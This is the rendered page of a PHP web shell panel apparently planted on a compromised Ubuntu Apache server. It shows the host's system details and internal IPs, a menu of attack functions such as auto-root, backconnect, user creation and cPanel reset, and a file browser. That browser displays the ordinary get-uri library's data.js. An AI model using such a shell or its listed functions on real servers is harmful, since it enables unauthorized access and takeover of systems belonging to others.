Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
get-uri /
dist /
[ HOME SHELL ]
Name
Size
Permission
Action
data.d.ts
428
B
-rw-rw-r--
data.js
1.6
KB
-rw-rw-r--
data.js.map
1.08
KB
-rw-rw-r--
file.d.ts
555
B
-rw-rw-r--
file.js
2.08
KB
-rw-rw-r--
file.js.map
1.33
KB
-rw-rw-r--
ftp.d.ts
410
B
-rw-rw-r--
ftp.js
3.12
KB
-rw-rw-r--
ftp.js.map
2.27
KB
-rw-rw-r--
http-error.d.ts
236
B
-rw-rw-r--
http-error.js
506
B
-rw-rw-r--
http-error.js.map
420
B
-rw-rw-r--
http.d.ts
872
B
-rw-rw-r--
http.js
7.08
KB
-rw-rw-r--
http.js.map
5.07
KB
-rw-rw-r--
https.d.ts
195
B
-rw-rw-r--
https.js
544
B
-rw-rw-r--
https.js.map
318
B
-rw-rw-r--
index.d.ts
1.7
KB
-rw-rw-r--
index.js
2.09
KB
-rw-rw-r--
index.js.map
1.13
KB
-rw-rw-r--
notfound.d.ts
280
B
-rw-rw-r--
notfound.js
499
B
-rw-rw-r--
notfound.js.map
262
B
-rw-rw-r--
notmodified.d.ts
264
B
-rw-rw-r--
notmodified.js
538
B
-rw-rw-r--
notmodified.js.map
270
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : data.js
"use strict"; var __importDefault = (this && this.__importDefault) || function (mod) { return (mod && mod.__esModule) ? mod : { "default": mod }; }; Object.defineProperty(exports, "__esModule", { value: true }); exports.data = void 0; const debug_1 = __importDefault(require("debug")); const stream_1 = require("stream"); const crypto_1 = require("crypto"); const data_uri_to_buffer_1 = require("data-uri-to-buffer"); const notmodified_1 = __importDefault(require("./notmodified")); const debug = (0, debug_1.default)('get-uri:data'); class DataReadable extends stream_1.Readable { constructor(hash, buf) { super(); this.push(buf); this.push(null); this.hash = hash; } } /** * Returns a Readable stream from a "data:" URI. */ const data = async ({ href: uri }, { cache } = {}) => { // need to create a SHA1 hash of the URI string, for cacheability checks // in future `getUri()` calls with the same data URI passed in. const shasum = (0, crypto_1.createHash)('sha1'); shasum.update(uri); const hash = shasum.digest('hex'); debug('generated SHA1 hash for "data:" URI: %o', hash); // check if the cache is the same "data:" URI that was previously passed in. if (cache?.hash === hash) { debug('got matching cache SHA1 hash: %o', hash); throw new notmodified_1.default(); } else { debug('creating Readable stream from "data:" URI buffer'); const { buffer } = (0, data_uri_to_buffer_1.dataUriToBuffer)(uri); return new DataReadable(hash, Buffer.from(buffer)); } }; exports.data = data; //# sourceMappingURL=data.js.map
Close